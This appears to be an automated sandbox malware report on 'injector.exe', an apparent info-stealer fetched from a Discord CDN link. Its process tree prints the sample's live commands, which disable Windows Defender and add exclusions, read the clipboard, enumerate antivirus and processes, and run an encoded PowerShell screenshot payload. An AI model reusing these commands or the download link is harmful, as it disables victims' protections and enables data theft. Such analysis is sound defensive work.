Analysis
-
max time kernel
31s -
max time network
31s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
22-05-2024 22:02
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
https://cdn.discordapp.com/attachments/1242657054506877002/1242949319930417172/injector.exe?ex=664fb242&is=664e60c2&hm=adae9851ce01747042fcae6344efef7280794edcc37b2fcb2b80c2aae90ef1ba&
Resource
win10v2004-20240508-en
General
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
Processes:
powershell.exepowershell.exepid process 5640 powershell.exe 5228 powershell.exe -
Drops file in Drivers directory 3 IoCs
Processes:
attrib.exeinjector.exeattrib.exedescription ioc process File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe File opened for modification C:\Windows\System32\drivers\etc\hosts injector.exe File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe -
Executes dropped EXE 1 IoCs
Processes:
rar.exepid process 5452 rar.exe -
Loads dropped DLL 18 IoCs
Processes:
injector.exepid process 3640 injector.exe 3640 injector.exe 3640 injector.exe 3640 injector.exe 3640 injector.exe 3640 injector.exe 3640 injector.exe 3640 injector.exe 3640 injector.exe 3640 injector.exe 3640 injector.exe 3640 injector.exe 3640 injector.exe 3640 injector.exe 3640 injector.exe 3640 injector.exe 3640 injector.exe 3640 injector.exe -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\_MEI47442\python312.dll upx behavioral1/memory/3640-66-0x00007FF94A280000-0x00007FF94A958000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\_MEI47442\_ctypes.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI47442\libffi-8.dll upx behavioral1/memory/3640-73-0x00007FF95BB70000-0x00007FF95BB7F000-memory.dmp upx behavioral1/memory/3640-72-0x00007FF94BFD0000-0x00007FF94BFF5000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\_MEI47442\libcrypto-3.dll upx C:\Users\Admin\AppData\Local\Temp\_MEI47442\_socket.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI47442\_sqlite3.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI47442\_queue.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI47442\_lzma.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI47442\_hashlib.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI47442\_decimal.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI47442\_bz2.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI47442\unicodedata.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI47442\sqlite3.dll upx C:\Users\Admin\AppData\Local\Temp\_MEI47442\select.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI47442\libssl-3.dll upx behavioral1/memory/3640-131-0x00007FF94BE10000-0x00007FF94BE3D000-memory.dmp upx behavioral1/memory/3640-132-0x00007FF951E00000-0x00007FF951E19000-memory.dmp upx behavioral1/memory/3640-133-0x00007FF94BDE0000-0x00007FF94BE04000-memory.dmp upx behavioral1/memory/3640-134-0x00007FF94A100000-0x00007FF94A276000-memory.dmp upx behavioral1/memory/3640-136-0x00007FF95AE90000-0x00007FF95AE9D000-memory.dmp upx behavioral1/memory/3640-135-0x00007FF951DD0000-0x00007FF951DE9000-memory.dmp upx behavioral1/memory/3640-137-0x00007FF94BDA0000-0x00007FF94BDD3000-memory.dmp upx behavioral1/memory/3640-138-0x00007FF94B020000-0x00007FF94B0ED000-memory.dmp upx behavioral1/memory/3640-140-0x00007FF94A280000-0x00007FF94A958000-memory.dmp upx behavioral1/memory/3640-141-0x00007FF949BD0000-0x00007FF94A0F2000-memory.dmp upx behavioral1/memory/3640-142-0x00007FF94BD80000-0x00007FF94BD94000-memory.dmp upx behavioral1/memory/3640-144-0x00007FF95AC70000-0x00007FF95AC7D000-memory.dmp upx behavioral1/memory/3640-143-0x00007FF94BFD0000-0x00007FF94BFF5000-memory.dmp upx behavioral1/memory/3640-145-0x00007FF94BE10000-0x00007FF94BE3D000-memory.dmp upx behavioral1/memory/3640-146-0x00007FF949AB0000-0x00007FF949BCB000-memory.dmp upx behavioral1/memory/3640-219-0x00007FF94BDE0000-0x00007FF94BE04000-memory.dmp upx behavioral1/memory/3640-236-0x00007FF94A100000-0x00007FF94A276000-memory.dmp upx behavioral1/memory/3640-254-0x00007FF94A100000-0x00007FF94A276000-memory.dmp upx behavioral1/memory/3640-262-0x00007FF949AB0000-0x00007FF949BCB000-memory.dmp upx behavioral1/memory/3640-259-0x00007FF949BD0000-0x00007FF94A0F2000-memory.dmp upx behavioral1/memory/3640-258-0x00007FF94B020000-0x00007FF94B0ED000-memory.dmp upx behavioral1/memory/3640-257-0x00007FF94BDA0000-0x00007FF94BDD3000-memory.dmp upx behavioral1/memory/3640-256-0x00007FF95AE90000-0x00007FF95AE9D000-memory.dmp upx behavioral1/memory/3640-248-0x00007FF94A280000-0x00007FF94A958000-memory.dmp upx behavioral1/memory/3640-249-0x00007FF94BFD0000-0x00007FF94BFF5000-memory.dmp upx behavioral1/memory/3640-289-0x00007FF94BFD0000-0x00007FF94BFF5000-memory.dmp upx behavioral1/memory/3640-293-0x00007FF94BDE0000-0x00007FF94BE04000-memory.dmp upx behavioral1/memory/3640-301-0x00007FF949AB0000-0x00007FF949BCB000-memory.dmp upx behavioral1/memory/3640-300-0x00007FF95AC70000-0x00007FF95AC7D000-memory.dmp upx behavioral1/memory/3640-299-0x00007FF94BD80000-0x00007FF94BD94000-memory.dmp upx behavioral1/memory/3640-298-0x00007FF94B020000-0x00007FF94B0ED000-memory.dmp upx behavioral1/memory/3640-297-0x00007FF949BD0000-0x00007FF94A0F2000-memory.dmp upx behavioral1/memory/3640-296-0x00007FF94BDA0000-0x00007FF94BDD3000-memory.dmp upx behavioral1/memory/3640-295-0x00007FF951DD0000-0x00007FF951DE9000-memory.dmp upx behavioral1/memory/3640-294-0x00007FF94A100000-0x00007FF94A276000-memory.dmp upx behavioral1/memory/3640-292-0x00007FF951E00000-0x00007FF951E19000-memory.dmp upx behavioral1/memory/3640-291-0x00007FF94BE10000-0x00007FF94BE3D000-memory.dmp upx behavioral1/memory/3640-290-0x00007FF95BB70000-0x00007FF95BB7F000-memory.dmp upx behavioral1/memory/3640-288-0x00007FF95AE90000-0x00007FF95AE9D000-memory.dmp upx behavioral1/memory/3640-273-0x00007FF94A280000-0x00007FF94A958000-memory.dmp upx -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 82 ip-api.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
-
Enumerates processes with tasklist 1 TTPs 4 IoCs
Processes:
tasklist.exetasklist.exetasklist.exetasklist.exepid process 4692 tasklist.exe 5412 tasklist.exe 5620 tasklist.exe 5684 tasklist.exe -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
-
Kills process with taskkill 22 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 5656 taskkill.exe 5444 taskkill.exe 5792 taskkill.exe 5232 taskkill.exe 5664 taskkill.exe 5556 taskkill.exe 5260 taskkill.exe 5608 taskkill.exe 5924 taskkill.exe 728 taskkill.exe 6048 taskkill.exe 5804 taskkill.exe 5016 taskkill.exe 5508 taskkill.exe 5608 taskkill.exe 5644 taskkill.exe 5588 taskkill.exe 5532 taskkill.exe 5288 taskkill.exe 5900 taskkill.exe 5640 taskkill.exe 4292 taskkill.exe -
Suspicious behavior: EnumeratesProcesses 20 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 5640 powershell.exe 5640 powershell.exe 5604 powershell.exe 5604 powershell.exe 5604 powershell.exe 5604 powershell.exe 3148 powershell.exe 3148 powershell.exe 5640 powershell.exe 5640 powershell.exe 5228 powershell.exe 5228 powershell.exe 3148 powershell.exe 5228 powershell.exe 3660 powershell.exe 3660 powershell.exe 3660 powershell.exe 3856 powershell.exe 3856 powershell.exe 3856 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
tasklist.exetasklist.exepowershell.exepowershell.exetasklist.exeWMIC.exepowershell.exepowershell.exetasklist.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exedescription pid process Token: SeDebugPrivilege 5620 tasklist.exe Token: SeDebugPrivilege 5684 tasklist.exe Token: SeDebugPrivilege 5640 powershell.exe Token: SeDebugPrivilege 5604 powershell.exe Token: SeDebugPrivilege 4692 tasklist.exe Token: SeIncreaseQuotaPrivilege 1676 WMIC.exe Token: SeSecurityPrivilege 1676 WMIC.exe Token: SeTakeOwnershipPrivilege 1676 WMIC.exe Token: SeLoadDriverPrivilege 1676 WMIC.exe Token: SeSystemProfilePrivilege 1676 WMIC.exe Token: SeSystemtimePrivilege 1676 WMIC.exe Token: SeProfSingleProcessPrivilege 1676 WMIC.exe Token: SeIncBasePriorityPrivilege 1676 WMIC.exe Token: SeCreatePagefilePrivilege 1676 WMIC.exe Token: SeBackupPrivilege 1676 WMIC.exe Token: SeRestorePrivilege 1676 WMIC.exe Token: SeShutdownPrivilege 1676 WMIC.exe Token: SeDebugPrivilege 1676 WMIC.exe Token: SeSystemEnvironmentPrivilege 1676 WMIC.exe Token: SeRemoteShutdownPrivilege 1676 WMIC.exe Token: SeUndockPrivilege 1676 WMIC.exe Token: SeManageVolumePrivilege 1676 WMIC.exe Token: 33 1676 WMIC.exe Token: 34 1676 WMIC.exe Token: 35 1676 WMIC.exe Token: 36 1676 WMIC.exe Token: SeDebugPrivilege 3148 powershell.exe Token: SeIncreaseQuotaPrivilege 1676 WMIC.exe Token: SeSecurityPrivilege 1676 WMIC.exe Token: SeTakeOwnershipPrivilege 1676 WMIC.exe Token: SeLoadDriverPrivilege 1676 WMIC.exe Token: SeSystemProfilePrivilege 1676 WMIC.exe Token: SeSystemtimePrivilege 1676 WMIC.exe Token: SeProfSingleProcessPrivilege 1676 WMIC.exe Token: SeIncBasePriorityPrivilege 1676 WMIC.exe Token: SeCreatePagefilePrivilege 1676 WMIC.exe Token: SeBackupPrivilege 1676 WMIC.exe Token: SeRestorePrivilege 1676 WMIC.exe Token: SeShutdownPrivilege 1676 WMIC.exe Token: SeDebugPrivilege 1676 WMIC.exe Token: SeSystemEnvironmentPrivilege 1676 WMIC.exe Token: SeRemoteShutdownPrivilege 1676 WMIC.exe Token: SeUndockPrivilege 1676 WMIC.exe Token: SeManageVolumePrivilege 1676 WMIC.exe Token: 33 1676 WMIC.exe Token: 34 1676 WMIC.exe Token: 35 1676 WMIC.exe Token: 36 1676 WMIC.exe Token: SeDebugPrivilege 5228 powershell.exe Token: SeDebugPrivilege 5412 tasklist.exe Token: SeDebugPrivilege 4292 taskkill.exe Token: SeDebugPrivilege 5508 taskkill.exe Token: SeDebugPrivilege 5608 taskkill.exe Token: SeDebugPrivilege 5644 taskkill.exe Token: SeDebugPrivilege 5232 taskkill.exe Token: SeDebugPrivilege 5664 taskkill.exe Token: SeDebugPrivilege 5588 taskkill.exe Token: SeDebugPrivilege 5556 taskkill.exe Token: SeDebugPrivilege 5532 taskkill.exe Token: SeDebugPrivilege 5260 taskkill.exe Token: SeDebugPrivilege 6048 taskkill.exe Token: SeDebugPrivilege 5804 taskkill.exe Token: SeDebugPrivilege 5608 taskkill.exe Token: SeDebugPrivilege 5656 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
injector.exeinjector.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exedescription pid process target process PID 4744 wrote to memory of 3640 4744 injector.exe injector.exe PID 4744 wrote to memory of 3640 4744 injector.exe injector.exe PID 3640 wrote to memory of 5276 3640 injector.exe cmd.exe PID 3640 wrote to memory of 5276 3640 injector.exe cmd.exe PID 3640 wrote to memory of 5288 3640 injector.exe cmd.exe PID 3640 wrote to memory of 5288 3640 injector.exe cmd.exe PID 3640 wrote to memory of 5300 3640 injector.exe cmd.exe PID 3640 wrote to memory of 5300 3640 injector.exe cmd.exe PID 3640 wrote to memory of 5444 3640 injector.exe cmd.exe PID 3640 wrote to memory of 5444 3640 injector.exe cmd.exe PID 3640 wrote to memory of 5464 3640 injector.exe cmd.exe PID 3640 wrote to memory of 5464 3640 injector.exe cmd.exe PID 5288 wrote to memory of 5604 5288 cmd.exe cmd.exe PID 5288 wrote to memory of 5604 5288 cmd.exe cmd.exe PID 5300 wrote to memory of 5612 5300 cmd.exe mshta.exe PID 5300 wrote to memory of 5612 5300 cmd.exe mshta.exe PID 5444 wrote to memory of 5620 5444 cmd.exe tasklist.exe PID 5444 wrote to memory of 5620 5444 cmd.exe tasklist.exe PID 5276 wrote to memory of 5640 5276 cmd.exe powershell.exe PID 5276 wrote to memory of 5640 5276 cmd.exe powershell.exe PID 5464 wrote to memory of 5684 5464 cmd.exe tasklist.exe PID 5464 wrote to memory of 5684 5464 cmd.exe tasklist.exe PID 3640 wrote to memory of 5708 3640 injector.exe cmd.exe PID 3640 wrote to memory of 5708 3640 injector.exe cmd.exe PID 3640 wrote to memory of 5736 3640 injector.exe cmd.exe PID 3640 wrote to memory of 5736 3640 injector.exe cmd.exe PID 3640 wrote to memory of 5808 3640 injector.exe cmd.exe PID 3640 wrote to memory of 5808 3640 injector.exe cmd.exe PID 3640 wrote to memory of 5936 3640 injector.exe cmd.exe PID 3640 wrote to memory of 5936 3640 injector.exe cmd.exe PID 3640 wrote to memory of 6052 3640 injector.exe cmd.exe PID 3640 wrote to memory of 6052 3640 injector.exe cmd.exe PID 3640 wrote to memory of 6124 3640 injector.exe Conhost.exe PID 3640 wrote to memory of 6124 3640 injector.exe Conhost.exe PID 3640 wrote to memory of 5016 3640 injector.exe taskkill.exe PID 3640 wrote to memory of 5016 3640 injector.exe taskkill.exe PID 5708 wrote to memory of 1676 5708 cmd.exe Conhost.exe PID 5708 wrote to memory of 1676 5708 cmd.exe Conhost.exe PID 5808 wrote to memory of 4692 5808 cmd.exe tasklist.exe PID 5808 wrote to memory of 4692 5808 cmd.exe tasklist.exe PID 5736 wrote to memory of 3148 5736 cmd.exe Conhost.exe PID 5736 wrote to memory of 3148 5736 cmd.exe Conhost.exe PID 5016 wrote to memory of 5228 5016 cmd.exe powershell.exe PID 5016 wrote to memory of 5228 5016 cmd.exe powershell.exe PID 5936 wrote to memory of 5260 5936 cmd.exe taskkill.exe PID 5936 wrote to memory of 5260 5936 cmd.exe taskkill.exe PID 6124 wrote to memory of 5320 6124 cmd.exe reg.exe PID 6124 wrote to memory of 5320 6124 cmd.exe reg.exe PID 6052 wrote to memory of 5488 6052 cmd.exe systeminfo.exe PID 6052 wrote to memory of 5488 6052 cmd.exe systeminfo.exe PID 3640 wrote to memory of 6096 3640 injector.exe cmd.exe PID 3640 wrote to memory of 6096 3640 injector.exe cmd.exe PID 3640 wrote to memory of 4668 3640 injector.exe cmd.exe PID 3640 wrote to memory of 4668 3640 injector.exe cmd.exe PID 4668 wrote to memory of 4944 4668 cmd.exe tree.com PID 4668 wrote to memory of 4944 4668 cmd.exe tree.com PID 6096 wrote to memory of 6112 6096 cmd.exe Conhost.exe PID 6096 wrote to memory of 6112 6096 cmd.exe Conhost.exe PID 3640 wrote to memory of 4956 3640 injector.exe cmd.exe PID 3640 wrote to memory of 4956 3640 injector.exe cmd.exe PID 3640 wrote to memory of 6036 3640 injector.exe cmd.exe PID 3640 wrote to memory of 6036 3640 injector.exe cmd.exe PID 4956 wrote to memory of 5912 4956 cmd.exe tree.com PID 4956 wrote to memory of 5912 4956 cmd.exe tree.com -
Views/modifies file attributes 1 TTPs 2 IoCs
Processes:
attrib.exeattrib.exepid process 6112 attrib.exe 5896 attrib.exe
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://cdn.discordapp.com/attachments/1242657054506877002/1242949319930417172/injector.exe?ex=664fb242&is=664e60c2&hm=adae9851ce01747042fcae6344efef7280794edcc37b2fcb2b80c2aae90ef1ba&1⤵PID:3140
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --field-trial-handle=3748,i,1809100026287847100,9768898026582633513,262144 --variations-seed-version --mojo-platform-channel-handle=4888 /prefetch:11⤵PID:4288
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --field-trial-handle=4984,i,1809100026287847100,9768898026582633513,262144 --variations-seed-version --mojo-platform-channel-handle=4172 /prefetch:11⤵PID:4712
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=5264,i,1809100026287847100,9768898026582633513,262144 --variations-seed-version --mojo-platform-channel-handle=5276 /prefetch:81⤵PID:1428
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --no-appcompat-clear --field-trial-handle=5256,i,1809100026287847100,9768898026582633513,262144 --variations-seed-version --mojo-platform-channel-handle=5460 /prefetch:81⤵PID:3192
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --lang=en-US --service-sandbox-type=collections --no-appcompat-clear --field-trial-handle=5704,i,1809100026287847100,9768898026582633513,262144 --variations-seed-version --mojo-platform-channel-handle=5912 /prefetch:81⤵PID:936
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --field-trial-handle=5916,i,1809100026287847100,9768898026582633513,262144 --variations-seed-version --mojo-platform-channel-handle=5656 /prefetch:11⤵PID:392
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --field-trial-handle=6356,i,1809100026287847100,9768898026582633513,262144 --variations-seed-version --mojo-platform-channel-handle=6416 /prefetch:11⤵PID:2892
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=7404,i,1809100026287847100,9768898026582633513,262144 --variations-seed-version --mojo-platform-channel-handle=7400 /prefetch:81⤵PID:1512
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=23 --field-trial-handle=6368,i,1809100026287847100,9768898026582633513,262144 --variations-seed-version --mojo-platform-channel-handle=6352 /prefetch:11⤵PID:3424
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=7592,i,1809100026287847100,9768898026582633513,262144 --variations-seed-version --mojo-platform-channel-handle=7608 /prefetch:81⤵PID:4448
-
C:\Users\Admin\Downloads\injector.exe"C:\Users\Admin\Downloads\injector.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4744 -
C:\Users\Admin\Downloads\injector.exe"C:\Users\Admin\Downloads\injector.exe"2⤵
- Drops file in Drivers directory
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:3640 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\injector.exe'"3⤵
- Suspicious use of WriteProcessMemory
PID:5276 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\injector.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5640
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"3⤵
- Suspicious use of WriteProcessMemory
PID:5288 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5604
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('whitelisted', 0, 'injector', 16+16);close()""3⤵
- Suspicious use of WriteProcessMemory
PID:5300 -
C:\Windows\system32\mshta.exemshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('whitelisted', 0, 'injector', 16+16);close()"4⤵PID:5612
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:5444 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:5620
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:5464 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:5684
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"3⤵
- Suspicious use of WriteProcessMemory
PID:5708 -
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1676
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"3⤵
- Suspicious use of WriteProcessMemory
PID:5736 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3148
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:5808 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4692
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵
- Suspicious use of WriteProcessMemory
PID:5936 -
C:\Windows\system32\tree.comtree /A /F4⤵PID:5260
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"3⤵
- Suspicious use of WriteProcessMemory
PID:6052 -
C:\Windows\system32\systeminfo.exesysteminfo4⤵
- Gathers system information
PID:5488
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"3⤵
- Suspicious use of WriteProcessMemory
PID:6124 -
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath4⤵PID:5320
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUA